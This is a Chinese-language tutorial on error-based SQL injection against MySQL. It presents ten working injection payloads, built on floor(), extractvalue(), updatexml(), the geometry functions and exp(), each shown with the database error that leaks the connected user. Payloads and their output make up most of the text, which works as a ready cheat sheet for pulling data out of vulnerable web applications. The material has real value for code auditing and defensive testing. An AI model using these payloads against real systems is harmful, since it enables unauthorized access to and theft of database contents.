利用数据库报错来显示数据的注入方式经常会在入侵中利用到,这种方法有一点局限性,需要页面有错误回显。而在代码审计中,经常会遇到没有正常数据回显的SQL注入漏洞,这时候我们就需要用报错注入的方式最快地拿到注入的数据。
早在很久以前就用到的数据类型转换报错是用得最多的一种方式,这种方式大多用在微软的SQL Server上,利用的是convert()和cast()函数,MySQL的报错SQL注入方式更多,不过多数人以为只有三种,分别是floor()、updatexml()以及extractvalue()这三个函数,但实际上还有很多个函数都会导致MySQL报错并且显示出数据,它们分别是GeometryCollection()、polygon()、GTID_SUBSET()、multipoint()、multilinestring()、multipolygon()、LINESTRING()、exp(),下面我们来看看它们具体的报错用法,需要注意的一点是,这些方法并不是在所有版本都通用,也有比较老的版本没有这些函数。
通常注入的SQL语句大多是"select*from phpsec where id=?”这种类型,这里我们就用这种形式来说明怎么利用,利用方式分别如下。floor()
注入语句:
id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)
SQL语句执行后返回的错误信息如图所示
通过截图我们可以看到MySQL出现了报错,并且显示出了当前的连接用户名。
2. extractvalue()
注入语句:
id = 1 and (extractvalue(1, concat(0x5c, (select user()))))
错误信息如图所示
3. updatexml()
注入语句:
id = 1 AND (updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
错误信息:
[Err] 1105 - XPATH syntax error: '^$root@localhost^$'
4. GeometryCollection()
注入语句:
id = 1 AND GeometryCollection((select * from(select * from(select user())a)b))
错误信息:
[Err] 1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
5. polygon()
注入语句:
id = 1 AND polygon((select * from(select * from(select user())a)b))
错误信息:
[Err] 1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
6. multipoint()
注入语句:
id = 1 AND multipoint((select * from(select * from(select user())a)b))
错误信息:
[Err] 1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
7. multilinestring()
注入语句:
id = 1 AND multilinestring((select * from(select * from(select user())a)b))
错误信息:
[Err] 1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
8. multipolygon()
注入语句:
id = 1 AND multipolygon((select * from(select * from(select user())a)b))
错误信息:
[Err] 1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
9. linestring()
注入语句:
id = 1 AND LINESTRING((select * from(select * from(select user())a)b))
错误信息:
[Err] 1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
10. exp()
注入语句:
id = 1 and EXP(~(SELECT*from(SELECT user())a))
错误信息:
[Err] 1690 - DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'